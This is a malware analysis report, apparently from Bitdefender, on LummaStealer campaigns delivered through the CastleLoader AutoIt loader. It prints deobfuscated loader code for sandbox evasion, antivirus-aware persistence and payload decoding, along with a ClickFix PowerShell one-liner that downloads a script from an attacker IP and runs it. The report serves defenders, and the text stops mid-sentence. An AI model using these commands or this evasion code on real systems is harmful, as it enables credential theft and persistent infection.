{ "id": "df469e52-ccf3-4ba9-9ed4-393e3688e0f5", "created_at": "2026-04-06T01:30:16.218267Z", "updated_at": "2026-04-10T03:37:08.997924Z", "deleted_at": null, "sha1_hash": "48cf1e3184bbb2af724a60fabfd0a6f2a6cb75c5", "title": "LummaStealer Is Getting a Second Life Alongside CastleLoader", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 373943, "plain_text": "LummaStealer Is Getting a Second Life Alongside CastleLoader\r\nBy Bogdan Ionut Lazar\r\nArchived: 2026-04-06 01:16:16 UTC\r\nBitdefender researchers have discovered a surge in LummaStealer activity, showing how one of the world's most\r\nprolific information-stealing malware operations managed to survive despite being almost brought down by law\r\nenforcement less than a year ago.\r\nLummaStealer is a highly scalable information-stealing threat with a long history, having operated under a\r\nmalware-as-a-service model since it appeared on the scene in late 2022.\r\nThe threat quickly evolved into one of the most widely deployed infostealers worldwide, supported by a large\r\naffiliate ecosystem and a constantly adapting delivery infrastructure.\r\nDespite significant law-enforcement disruption efforts in 2025, LummaStealer operations continued,\r\ndemonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and\r\ndelivery techniques.\r\nOur analysis shows that LummaStealer infections are primarily driven by social engineering rather than by the\r\nexploitation of technical vulnerabilities.\r\nMalware campaigns consistently rely on users unwittingly running infected files, using simple lures such as fake\r\ncracked software, fake games or media downloads, and abuse of trusted platforms.\r\nRecent campaigns increasingly employ fake CAPTCHA (\"ClickFix\") techniques, converting normal users' web\r\ninteractions into direct command execution on victim systems.\r\nAt the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer\r\nspread through delivery chains. Its modular, in-memory execution model, extensive obfuscation, and flexible\r\ncommand-and-control communication make it well-suited to malware distribution of this scale.\r\nWe found some infrastructure overlap between CastleLoader and LummaStealer, which further suggests that both\r\ndeveloper teams are coordinating on it or at least share service providers.\r\nKey Findings\r\nLummaStealer is back at scale, despite a major 2025 law-enforcement takedown that disrupted thousands\r\nof its command-and-control domains. The operation has rapidly rebuilt its infrastructure and continues to\r\nspread worldwide.\r\nMost infections start with social engineering, not hacking. Victims are tricked into running the malware\r\nthemselves through fake cracked software, fake game or movie downloads, and deceptive \"human\r\nverification\" pages.\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 1 of 17\n\nFake CAPTCHA (\"ClickFix\") attacks are becoming a preferred entry point, turning routine web\r\ninteractions into manual command execution by the victim.\r\nCastleLoader has become a central delivery mechanism, using in-memory execution, heavy obfuscation,\r\nand flexible payload deployment to evade detection and distribute LummaStealer.\r\nA DNS artefact exposes CastleLoader activity. The loader deliberately triggers failed DNS lookups to\r\nnonexistent domains, creating a detectable pattern that can be used to identify related campaigns.\r\nInfrastructure overlap links CastleLoader and LummaStealer operations, suggesting shared services or\r\ncoordination within a broader malware-as-a-service ecosystem.\r\nThe privacy impact is severe and long-lasting. Stolen credentials, active sessions, personal documents and\r\ncryptocurrency data enable account takeovers, financial fraud, identity theft and extortion.\r\nIntroduction\r\nLummaStealer emerged on Russian-language forums in late 2022, and evolved into one of the most prolific\r\ninfostealers by the mid-2020s. It targets Windows systems and can harvest a wide range of sensitive data,\r\nincluding browser credentials, session cookies, cryptocurrency wallets and even two-factor authentication (2FA)\r\ntokens.\r\nUnder its MaaS model, Lumma's developers lease the malware to an extensive network of cybercriminal affiliates\r\nacross the world. This has resulted in hundreds of thousands of infections across multiple industries, positioning\r\nLumma as a significant enabler of secondary crimes such as account takeovers and fraudulent financial activity.\r\nIn May 2025, Lumma's infrastructure was disrupted during a law-enforcement takedown that neutralized more\r\nthan 2,300 command-and-control domains. However, the operation wasn't fully dismantled. Instead, the threat\r\nactors behind Lumma migrated to bulletproof hosting providers that are less cooperative with law enforcement.\r\nRecently, we have observed a considerable increase in LummaStealer activity in our insights. Loaders are\r\ntypically delivered through evolving social-engineering lures, ranging from fake CAPTCHA challenges to bogus\r\nupdate notifications on Steam pages and game development websites. The loaders themselves change frequently;\r\nwe've seen LummaStealer using Rugmi, DonutLoader, and, more recently, CastleLoader for initial execution.\r\nBy itself, CastleLoader is a sophisticated loader that executes in stages, entirely in memory, obfuscates its code,\r\ndynamically resolves APIs, and communicates with a large C2 infrastructure using stealth techniques. Its flexible,\r\nmodular design allows threat actors to plug in various payloads while remaining relatively hidden in victim\r\nsystems.\r\nPrevious research has identified an overlap between the infrastructure used in Lumma Stealer and CastleLoader\r\ncampaigns. Recorded Future's Insikt Group, which monitors the threat actor known as GrayBravo, the developer\r\nbehind CastleLoader, observed that multiple domains within the CastleLoader ecosystem were also linked to\r\nLumma operations.\r\nThis shared infrastructure suggests that the same threat actors and service providers may be supporting both\r\nCastleLoader and Lumma Stealer. This overlap is consistent with the reuse of domain registrations or hosting\r\nresources across multiple malware families, further highlighting the close operational relationship between\r\nCastleLoader and LummaStealer delivery activity.\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 2 of 17\n\nIn this research, we examine how LummaStealer is delivered via CastleLoader, outline the most common\r\ndistribution methods, and highlight indicators of compromise (IoCs) and behavioral patterns to identify\r\nCastleLoader and LummaStealer activity. We also present a method for identifying recent CastleLoader scripts\r\nusing failed DNS requests.\r\nTechnical analysis - CastleLoader\r\nCastleLoader is a script-based loader that aims to decrypt and load a payload into memory. Variants are\r\nimplemented in Python, but we discovered one implemented in AutoIt in this campaign.\r\nChoosing script interpreters to implement the loader can bypass dynamic detection during runtime, as script\r\ninterpreter processes can, by design, perform various actions depending on the script they run. In this case,\r\nantimalware solutions might be more permissive towards them.\r\nAnother reason is that it is very easy to apply obfuscation schemes to script files (changing function and variable\r\nnames with words from a dictionary, control-flow obfuscation, etc.).\r\nThe main CastleLoader executables we analysed are delivered as compiled AutoIt files. These files bundle an\r\nAutoIt script and the AutoIt interpreter into a single executable for convenience.\r\nAfter extracting the embedded AutoIt script, we are faced with a heavily obfuscated script, where most of the code\r\nleads to dead ends or to instructions that don't do anything on the system. Deobfuscating the script reveals its true\r\nintent.\r\nAs a first pattern, we can see that variables are renamed using words or word combinations from a dictionary.\r\nAnother common occurrence is a function that decodes strings in the file by taking the hex values in the buffer and\r\nsubtracting the key from them.\r\nFunc COMMONLYOMAN ( $REMEMBER , $ANGER )\r\n$CEMENT = \"\"\r\n $CONFIGURATIONAIRPORT = Call ( StringReverse ( \"tilpSgnirtS\" ) , $REMEMBER , \"%\" , 2 )\r\nFor $AMEND = 269 + 4294967027 To Call ( \"UBound\" , $CONFIGURATIONAIRPORT ) + 4294967295\r\n $CEMENT \u0026= ChrW ( $CONFIGURATIONAIRPORT [ $AMEND ] - $ANGER )\r\nNext\r\nReturn $CEMENT\r\nEndFunc\r\nEven after deobfuscation, we are still left with many junk instructions (e.g., arithmetic operations that yield trivial\r\nresults, conditions that always resolve to one branch, etc.). However, we can start to make sense of the script now.\r\nFirst, we see a section where some sandbox/environment detection happens. If specific computer names or\r\nusernames are found, the process window is closed, effectively terminating execution.\r\nfig1:\r\nFunc COMMONLYOMAN ( $REMEMBER , $ANGER )\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 3 of 17\n\n$CEMENT = \"\"\r\n $CONFIGURATIONAIRPORT = Call ( StringReverse ( \"tilpSgnirtS\" ) , $REMEMBER , \"%\" , 2 )\r\nFor $AMEND = 269 + 4294967027 To Call ( \"UBound\" , $CONFIGURATIONAIRPORT ) + 4294967295\r\n $CEMENT \u0026= ChrW ( $CONFIGURATIONAIRPORT [ $AMEND ] - $ANGER )\r\nNext\r\nReturn $CEMENT\r\nEndFunc\r\nfig2:\r\n( Call ( \"EnvGet\" , \"COMPUTERNAME\" ) = \"tz\" ) ? ( Call ( \"WinClose\" , Call ( \"AutoItWinGetTitle\" ) ) ) : ( Opt (\r\n( Call ( \"EnvGet\" , \"COMPUTERNAME\" ) = \"NfZtFbPfH\" ) ? ( Call ( \"WinClose\" , Call ( \"AutoItWinGetTitle\" ) ) ) :\r\n( Call ( \"EnvGet\" , \"COMPUTERNAME\" ) = \"ELICZ\" ) ? ( Call ( \"WinClose\" , Call ( \"AutoItWinGetTitle\" ) ) ) : ( Op\r\n( Call ( \"EnvGet\" , \"USERNAME\" ) = \"test22\" ) ? ( Call ( \"WinClose\" , Call ( \"AutoItWinGetTitle\" ) ) ) : ( Opt (\r\nfig3:\r\n( Ping ( \"sfcphDaHojOHzEbBXPMIuBTaOH.sfcphDaHojOHzEbBXPMIuBTaOH\" , 1000 ) \u003c\u003e 0 ) ? ( Call ( \"WinClose\" , Call (\r\nfig4:\r\nIf ProcessExists ( \"vmtoolsd.exe\" ) = True Or ProcessExists ( \"VboxTray.exe\" ) = True Or ProcessExists ( \"Sandbo\r\n( Call ( \"ProcessExists\" , \"avastui.exe\" ) ) ? CustomSleep ( 10000 ) : ( Opt ( \"TrayIconHide\" , 29683490 / 29683\r\nfig5:\r\n$persistence_drop_path_2 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\V\"\r\nIf ProcessExists ( \"AvastUI.exe\" ) Or ProcessExists ( \"AVGUI.exe\" ) Or ProcessExists ( \"SophosHealth.exe\" ) Then\r\n$persistence_drop_path_2 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\V.a3x\"\r\nIf Not FileExists ( $persistence_drop_path_2 ) Then\r\nFileCopy ( @ScriptFullPath , $persistence_drop_path_2 , 9 )\r\nEndIf\r\n$persistence_drop_path = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\StitchCraftX.bat\"\r\nIf ProcessExists ( \"AvastUI.exe\" ) Or ProcessExists ( \"AVGUI.exe\" ) Or ProcessExists ( \"bdagent.exe\" ) Or Proces\r\n$persistence_drop_path = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\AutoIt3.exe\"\r\nIf Not FileExists ( $persistence_drop_path ) And $persistence_drop_path \u003c\u003e @AutoItExe Then\r\n$drop_exe_file = FileOpen ( $persistence_drop_path , 10 )\r\nFileWrite ( $drop_exe_file , FileRead ( FileOpen ( @AutoItExe , 16 ) ) )\r\nFileClose ( $drop_exe_file )\r\nEndIf\r\n$persistence_drop_path_3 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\StitchCraftX.lnk\"\r\nIf Not FileExists ( $persistence_drop_path_3 ) Then\r\nFileCreateShortcut ( $persistence_drop_path , $persistence_drop_path_3 , @LocalAppDataDir \u0026 \"\\CraftStit\r\nEndIf\r\nIf ProcessExists ( \"avp.exe\" ) Or ProcessExists ( \"bdagent.exe\" ) Then\r\n$internet_shortcut_file = FileOpen ( @StartupDir \u0026 \"\\StitchCraftX.url\" , 34 )\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 4 of 17\n\nFileWrite ( $internet_shortcut_file , \"[InternetShortcut]\" \u0026 @CRLF \u0026 \"URL=\" \u0026 ChrW ( 34 ) \u0026 $persistenc\r\nFileClose ( $internet_shortcut_file )\r\nElse\r\n$BULLLEGITIMATELONGITUDEWOODS = DllCall ( \"kernel32.dll\" , \"bool\" , \"CreateProcessW\" , \"wstr\" , Null ,\r\nEndIf\r\nUnintended CastleLoader characteristic - anomalous DNS requests\r\nAfter sandbox detection, we noticed a Ping operation that fails with a nonexistent domain, as the failure branch\r\ncontains code to hide the window of the executing AutoIt process.\r\nHowever, this leaves an interesting artifact that makes the loader identifiable. The ping function tries to resolve the\r\ndomain generated as a random string repeated twice, joined by a dot, i.e., \u003cstring\u003e.\u003cstring\u003e.\r\nThis behavior triggers a DNS lookup for a nonexistent domain. The resulting anomalous request is easy to identify\r\nusing this pattern, which allowed us to uncover hundreds of samples linked to the current campaign.\r\n( Ping ( \"sfcphDaHojOHzEbBXPMIuBTaOH.sfcphDaHojOHzEbBXPMIuBTaOH\" , 1000 ) \u003c\u003e 0 ) ? ( Call ( \"WinClose\" , Call (\r\nSandbox detection and payload decoding\r\nIt then checks whether the script is running in a sandbox. If processes specific to virtualization software are\r\nrunning on the system, the loader terminates its execution.\r\nIf ProcessExists ( \"vmtoolsd.exe\" ) = True Or ProcessExists ( \"VboxTray.exe\" ) = True Or ProcessExists ( \"Sandb\r\n( Call ( \"ProcessExists\" , \"avastui.exe\" ) ) ? CustomSleep ( 10000 ) : ( Opt ( \"TrayIconHide\" , 29683490 / 29683\r\nThe following lines contain adjustments to persistence paths based on specific antimalware solutions installed on\r\nthe system. This is probably the result of testing with said antimalware vendor and detection evasion that worked\r\nat the time of development.\r\n$persistence_drop_path_2 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\V\"\r\nIf ProcessExists ( \"AvastUI.exe\" ) Or ProcessExists ( \"AVGUI.exe\" ) Or ProcessExists ( \"SophosHealth.exe\" ) Then\r\n$persistence_drop_path_2 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\V.a3x\"\r\nIf Not FileExists ( $persistence_drop_path_2 ) Then\r\nFileCopy ( @ScriptFullPath , $persistence_drop_path_2 , 9 )\r\nEndIf\r\n$persistence_drop_path = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\StitchCraftX.bat\"\r\nIf ProcessExists ( \"AvastUI.exe\" ) Or ProcessExists ( \"AVGUI.exe\" ) Or ProcessExists ( \"bdagent.exe\" ) Or Proces\r\n$persistence_drop_path = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\AutoIt3.exe\"\r\nIf Not FileExists ( $persistence_drop_path ) And $persistence_drop_path \u003c\u003e @AutoItExe Then\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 5 of 17\n\n$drop_exe_file = FileOpen ( $persistence_drop_path , 10 )\r\nFileWrite ( $drop_exe_file , FileRead ( FileOpen ( @AutoItExe , 16 ) ) )\r\nFileClose ( $drop_exe_file )\r\nEndIf\r\n$persistence_drop_path_3 = @LocalAppDataDir \u0026 \"\\CraftStitch Studios Inc\\StitchCraftX.lnk\"\r\nIf Not FileExists ( $persistence_drop_path_3 ) Then\r\nFileCreateShortcut ( $persistence_drop_path , $persistence_drop_path_3 , @LocalAppDataDir \u0026 \"\\CraftStit\r\nEndIf\r\nIf ProcessExists ( \"avp.exe\" ) Or ProcessExists ( \"bdagent.exe\" ) Then\r\n$internet_shortcut_file = FileOpen ( @StartupDir \u0026 \"\\StitchCraftX.url\" , 34 )\r\nFileWrite ( $internet_shortcut_file , \"[InternetShortcut]\" \u0026 @CRLF \u0026 \"URL=\" \u0026 ChrW ( 34 ) \u0026 $persistenc\r\nFileClose ( $internet_shortcut_file )\r\nElse\r\n$BULLLEGITIMATELONGITUDEWOODS = DllCall ( \"kernel32.dll\" , \"bool\" , \"CreateProcessW\" , \"wstr\" , Null ,\r\nEndIf\r\nPersistence is done in 3 steps:\r\n1.      Copies the currently executing script (embedded in the initial executable) to the variable constructed in\r\n$persistence_drop_path_2 (note: variable was renamed during analysis)\r\n2.      Copies the AutoIt interpreter to $persistence_drop_path\r\n3.      Creates an Internet shortcut file in the current user's Startup directory that launches the AutoIt interpreter\r\nwith the script as a command-line argument\r\nFinally, it uses two hardcoded shellcodes to decrypt and load the intended payload, which can be either the\r\nLumma stealer executable or a further stage in the execution chain (e.g. a downloader that fetches the stealer from\r\na C2 server).\r\nThe first shellcode decrypts the payload with a given XOR key, while the second one uses a different XOR key to\r\ndecrypt the second layer. This results in an LZNT1-compressed buffer, which is decompressed using\r\nRtlDecompressFragment to obtain a valid MZPE stream.\r\nThis payload is then loaded into the current process's address space and executed.\r\nLummaStealer analysis\r\nLummaStealer is offered as MaaS, with clients able to purchase a subscription tier to access some of the malware's\r\nfeatures and capabilities.\r\nThis ranges from various infection vectors and loaders to a complete C2 infrastructure for the operations of the\r\nstealer. The pricing in 2023 ranged from $250 to $20,000 for the full premium package.\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 6 of 17\n\nThe malware itself, once delivered and launched, is a straightforward stealer, meaning that it collects files\r\ncontaining sensitive data and uploads them to the C2 server specified in its config file.\r\nStealing capabilities of the payload:\r\nCredentials saved in web browsers\r\nCookies\r\nPersonal documents (.docx, .pdf, etc.)\r\nSensitive files containing financial information, secret keys (including cloud keys), 2FA backup codes, and\r\nserver passwords as well as cryptocurrency private keys and wallet data\r\nPersonal data such as ID numbers, addresses, medical records, credit card numbers, and dates of birth\r\nCryptocurrency wallets and browser extensions associated with popular services like MetaMask, Binance,\r\nElectrum, Ethereum, Exodus, Coinomi, Bitcoin Core, JAXX, and Steem Keychain.\r\nData from remote access tools and password managers, specifically AnyDesk and KeePass.\r\nTwo-factor authentication (2FA) tokens and extensions such as Authenticator, Authy, EOS Authenticator,\r\nGAuth Authenticator, and Trezor Password Manager.\r\nInformation from VPNs (.ovpn files), various email clients (Gmail, Outlook, Yahoo), and FTP clients.\r\nSystem metadata, including CPU information, operating system version (Windows 7 to Windows 11),\r\nsystem locale, installed applications, username, hardware ID, and screen resolution, is useful for profiling\r\nvictims or tailoring future exploits.\r\nIn the sample we analyzed from the CastleLoader delivery, we have also seen the following capabilities:\r\ntheft of Discord and Steam data\r\nscreenshot capture\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 7 of 17\n\nclipboard data\r\nCampaign distribution and user lures\r\nThe campaigns we observed primarily rely on social engineering rather than on exploiting software\r\nvulnerabilities. Across all analyzed killchains, the initial compromise takes place only after the user actually runs\r\nthe malware. The attacker's success depends on persuading the victim to run malicious content.\r\nThis approach is particularly effective in the Lumma ecosystem because loaders such as CastleLoader are\r\nlightweight, flexible, and designed to blend into common content that people might find online.\r\nIn the following, we dissect some of the most prevalent delivery methods.\r\nCastleLoader delivery flavours\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 8 of 17\n\nThe CastleLoader chains we analyzed usually start with bait downloads. This seems to be the most prevalent tactic\r\nof the Lumma ecosystem.\r\nThese baits range from creating fake websites that promise cracked software installers, nonexistent game installers\r\non itch[.]io, torrents promising newly released movies or, very often, adult movies.\r\nThe files delivered this way are usually self-extracting archives or NSIS installers. The files contain CastleLoader\r\neither as an embedded script in the executable or a separate AutoIt interpreter and a script file, both written to the\r\nsame folder on the disk.\r\nFree and pirated software\r\nOne of the most common lure categories observed in these campaigns involves fake installers for cracked or\r\npremium software. Victims are redirected to websites advertising free access to commercial tools, game cracks, or\r\nother software. These downloads are usually packaged as self-extracting archives or NSIS installers, formats that\r\nclosely resemble legitimate software distribution.\r\nCastleLoader-based chains frequently begin with such bait downloads. The user executes what appears to be a\r\nstandard installer, which in reality contains the initial loader stage.\r\nBecause cracked software is expected to trigger warnings, require elevated privileges, or behave inconsistently,\r\nsecurity prompts generated by the operating system or endpoint protection solutions are often dismissed as typical\r\nside effects rather than indicators of malicious activity.\r\nA typical killchain in this scenario would look something like:\r\n1. Initial Access: The user downloads the lure \"game installer\" archive and either double clicks the setup.exe\r\ninside or extracts the files in the intended location and then runs the setup.\r\n2. Execution: setup.exe is the entry point of the malware, and it is willingly launched by the user\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 9 of 17\n\nexplorer.exe → \\Device\\HarddiskVolumeX\\NFS\\Need for Speed Hot Pursuit\\Setup.exe\r\n3. Installation: The fake installer writes the embedded components to the filesystem: Sessions.vstm (a .bat file)\r\nand Point.vstm (a cabinet (.cab) archive file with CastleLoader inside)\r\n4. The fake installer launches the command-line utility to execute the batch script\r\ncmd.exe /c cmd \u003c Sessions.vstm\r\n5. The batch script does some initial environment checking to adjust file names if some antimalware components\r\nare found.\r\ntasklist | findstr \"SophosHealth nsWscSvc ekrn bdservicehost AvastUI AVGUI \u0026 if not errorlevel 1 Set WZiGzYQA\r\n5.      The batch script runs extrac32, present on the system, to extract the .cab file in the current directory\r\nextrac32 /Y Point.vstm *.*\r\n6.      Finally, the batch script launches the renamed AutoIt interpreter (Rope.pif) with the CastleLoader script as a\r\nparameter (b). This will achieve the objective of the malware, to execute LummaStealer on the victim system.\r\nRope.pif b\r\nAnother recurring lure consists of nonexistent game installers or archives advertising newly released movies, often\r\ndistributed through torrent platforms or file-sharing websites.\r\nAdult-themed content is also frequently used to attract victims and reduce scrutiny. These files are also often\r\npackaged as self-extracting archives or NSIS installers. They contain relatively small CastleLoader resources and\r\na large chunk of random data, which increases the overall file size.\r\nThis technique further legitimizes the file for the user, as a movie should be larger than 600-700 MB.\r\nFile and folder naming conventions, archive structures, and embedded executables are crafted to appear consistent\r\nwith real game or media downloads. Users anticipate extraction steps and launcher executables, making it less\r\nsuspicious when malware is executed from temporary directories or newly created folders.\r\nMultiple clusters in our telemetry reflect this pattern, with execution originating from WinRAR extraction paths or\r\nuser download directories before transitioning into CastleLoader-driven execution chains. \r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 10 of 17\n\n1. Initial Access: The user downloads a torrent that promises a newly released movie in an archive. The user\r\nopens the archive and double-clicks the \"movie\" file.\r\nexplorer.exe -\u003e Command: \"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"D:\\TORRENT\\Mission Impossible. Final Reckoning.\r\n2. Execution: The \"movie\" file is a Windows executable and it has a double extension .mp4.exe. Instead of\r\nplaying a movie it will run on the system. Double-clicking it from an archive will extract it in the current user's\r\n%TEMP% folder and execute it from there.\r\nProcess: \\Device\\HarddiskVolumeX\\Users\\anonymized_user\\AppData\\Local\\Temp\\Rar$EXa14612.44616\\Mission Impossible\r\n3. Installation: The executable is an installer and it writes the resources to the filesytem under a random name\r\n(e.g. Pros)\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 11 of 17\n\n4. Launches the command-line utility to rename Pros to Pros.cmd, allowing direct execution by the cmd.exe\r\nprocess\r\nCommand: \"C:\\Windows\\System32\\cmd.exe\" /c copy Pros Pros.cmd \u0026 Pros.cmd\r\n5. The .cmd script performs an environment check, searching for antimalware components. It uses utilities already\r\npresent on the system\r\ntasklist | findstr /I \"opssvc wrsa\"tasklist | findstr \"AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth\r\n6. Creates a new directory in the %TEMP% folder where it was launched from with the command\r\ncmd /c md 187743\r\n7. Extracts the .cab file with the extrac32 tool\r\nCommand: extrac32 /Y /E Luggage\r\n8. Copies all extracted components into the newly created directory, concatenating the individual parts of the files\r\n(static detection evasion) into a single executable and a single script.\r\nCommand: cmd /c copy /b 187743\\AutoIt3.exe + Jeff + Medicine + Controller + Marketplace + Vienna + Ebooks + P\r\n9. Finally, it launches the CastleLoader script with the newly written AutoIt interpreter:\r\nCommand: AutoIt3.exe V.a3x\r\nExamples of games and software lures\r\nmad max.exe\r\n{autocad 2008 keygen only xforce rar}.exe - software pirating lure\r\nMicrosoft dynamics rms product key work.exe\r\nTradingView Installer Setup 2.11.7073.exe - financial software\r\nDark_souls_prepare_to_die_edition_[full][español][mega].exe - cracked game sim aquarium 3 crack 4.exe\r\n- cracked game\r\nKɱŠpico.rar - similar to KMS pico, Windows activation\r\nMovavi Video Editor 15.4.1 Crack With Registration Key Free Download 2020 - cracked software\r\nFix Low FPS Speed Up Your Processor Optimize CPU for Gaming Performance - RiPEX.tmp -\r\nperformance optimizer lure\r\nExamples of movies and tv shows lures \r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 12 of 17\n\nThe Pendragon Cycle Rise of the Merlin S01E03 1080p WEB-DL NewComers.exe\r\nA Knight of the Seven Kingdoms S01E03 720p HMAX WEB-DL DDP5 1 H 264-NTb.exe\r\npredator badlands 2025.1080p.web.h264-slot.exe\r\nshelter (2026) [1080p] [webrip] [5.1].exe\r\navatar fire and ash (2025) [1080p] [webrip] [5.1].exe\r\nAbuse of legitimate platforms and content delivery networks\r\nLumma loaders were distributed across multiple campaigns via legitimate platforms and content delivery\r\nnetworks, including game-related websites, messaging platforms, and file-sharing services.\r\nWhile the underlying infrastructure is not malicious, it lends credibility to the payload and lowers the perceived\r\nrisk for the user.\r\nThe most significant CDNs observed are:\r\nSteam workshop\r\nDiscord shared files\r\nClickFix delivery\r\nClickFix remains an important and highly effective infection vector in LummaStealer campaigns. Unlike\r\ntraditional malware delivery methods, ClickFix does not rely solely on file downloads.\r\nInstead, it abuses fake CAPTCHA or verification pages that instruct users to perform a series of manual actions to\r\n\"prove\" they are human.\r\nTypically, victims are instructed to press Win + R, paste the contents of the clipboard, and press Enter. The\r\nmalicious website has already placed a PowerShell one-liner on the clipboard, which, when executed, retrieves\r\nand runs the next-stage loader directly from the attacker's infrastructure.\r\nIn several cases, this stage subsequently deployed CastleLoader, which then fetched and executed LummaStealer.\r\nExample command line:\r\ncmd.exe /c start /min powershell [Text.Encoding]::UTF8.GetString((('262867616c2077672a29202d7573656220687474703\r\nThe encoded text translates to an Invoke-WebRequest command whose results are piped to an Invoke-Expression\r\ncommand, effectively executing the script hosted on the server.\r\n\u0026(gal wg*) -useb hxxp://45[.]221[.]64[.]224/12.d|iex\r\nThe effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities. The\r\ninstructions resemble troubleshooting steps or verification workarounds that users may have encountered\r\npreviously.\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 13 of 17\n\nAs a result, victims often fail to recognize that they are manually executing arbitrary code on their own system.\r\nDelivery with obfuscated VBA\r\nIn some campaigns, we saw an extra layer of a loader that runs obfuscated VBA scripts before running the AutoIt\r\nscript that loads LummaStealer.Persistence is achieved through scheduled tasks, and the VBA loader runs the\r\nschtasks command to enable periodic execution.\r\nThe killchain looks very similar to the ones presented before.\r\n 1. The user is lured to run the first executable that extracts a VBA script to a path that resembles legitimate\r\nsoftware.\r\n2. Then, the installer executes wscript.exe with the script file\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\anonymized_user\\AppData\\Local\\SyncSmartHomeX Elite Technologies Co\\\r\n3. The script ensures persistence with a scheduled task that runs every minute\r\ncmd /c schtasks.exe /create /tn \"Once\" /tr \"wscript //B 'C:\\Users\\anonymized_user\\AppData\\Local\\SyncSmartHomeX\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 14 of 17\n\n4. The script is responsible for executing the renamed AutoIt interpreter with the script passed as a command-line\r\nargument\r\n\"C:\\Users\\anonymized_user\\AppData\\Local\\SyncSmartHomeX Elite Technologies Co\\SmartHomeSyncX.pif\" \"C:\\Users\\NIU\r\nGeographical distribution\r\nLumma stealer is still prevalent globally, with active infections observed mostly in India but also in the US and\r\nEurope. The investigation covered a period of one month, between December 12 and January 12.\r\nIt's worth noting that, since Lumma operates as a malware-as-a-service, the distribution shown below is just a\r\nsnapshot. When the threat actors who buy these services decide to target other regions, the distribution will shift\r\naccordingly.\r\nPrivacy impact\r\nOnce LummaStealer is successfully deployed, the impact on user privacy is severe. The malware is designed to\r\nharvest a broad range of sensitive information from infected systems, enabling both immediate exploitation and\r\nlong-term abuse.\r\nCompromised credentials and active sessions\r\nLummaStealer extracts stored credentials, authentication cookies, and active browser sessions from a wide range\r\nof applications. This enables attackers to bypass passwords entirely and access user accounts directly.\r\nEmail accounts are particularly valuable targets, as they allow attackers to reset credentials for other services and\r\nfacilitate large-scale account takeover scenarios.\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 15 of 17\n\nFinancial and cryptocurrency exposure\r\nInfected systems may expose cryptocurrency wallets, browser-stored payment information, and authenticated\r\nsessions for financial platforms. Even when direct wallet theft is not immediately observed, stolen credentials and\r\nsessions can be sold or reused for fraudulent transactions, subscription abuse, or monetization through\r\nunderground markets.\r\nPersonal documents and identity theft\r\nThe exfiltration of documents and images significantly increases the long-term impact of infection. Sensitive\r\npersonal files such as identification documents, contracts, invoices, or private correspondence may be harvested\r\nand used for identity theft, fraud, or highly targeted social engineering.\r\nBlackmail and coercion risks\r\nIn campaigns leveraging adult-themed or sensitive lures, attackers may attempt extortion by threatening to\r\ndisclose browsing habits, private documents, or alleged surveillance data. Even when such claims are exaggerated,\r\nthe stolen information can be sufficient to pressure victims into compliance, amplifying the harm caused by the\r\ninfection.\r\nRecommended user and organizational mitigations\r\nBecause LummaStealer and its associated loaders rely heavily on user interaction, effective mitigation requires a\r\ncombination of user awareness, behavioral controls, and post-infection response.\r\nUsers should avoid downloading software, games, or media from untrusted or unofficial sources, particularly\r\nwhen content is advertised as cracked, free, or exclusive. Any website instructing users to manually execute\r\ncommands, especially PowerShell and command-line utilities, should be treated as malicious by default.\r\nIn the event of suspected infection, remediation must extend beyond malware removal. Users should immediately\r\nrotate passwords for all accounts accessible on the affected system, invalidate active sessions where possible, and\r\nprioritize credential changes for email, financial services, and work-related platforms. In many cases, a full\r\noperating system reinstallation is required to restore trust in the compromised device.\r\nOrganizations should invest in user education focused on social engineering techniques, monitor for anomalous\r\nauthentication behavior, and enforce multi-factor authentication to reduce the impact of credential theft. Detection\r\nstrategies should include behavioral indicators associated with loaders such as CastleLoader, including suspicious\r\nprocess chains, abuse of living-off-the-land binaries, and anomalous DNS activity.\r\nConclusions\r\nLummaStealer remains a significant and evolving threat due to its combination of effective social engineering,\r\nflexible loader infrastructure, and a well-established MaaS ecosystem.\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 16 of 17\n\nThe continued use of loaders such as CastleLoader, along with techniques like ClickFix, demonstrates a strategic\r\nshift toward delivery mechanisms that are difficult to disrupt through traditional technical defenses alone.\r\nEffective defense against LummaStealer requires more than signature-based detection or infrastructure takedowns.\r\nBecause 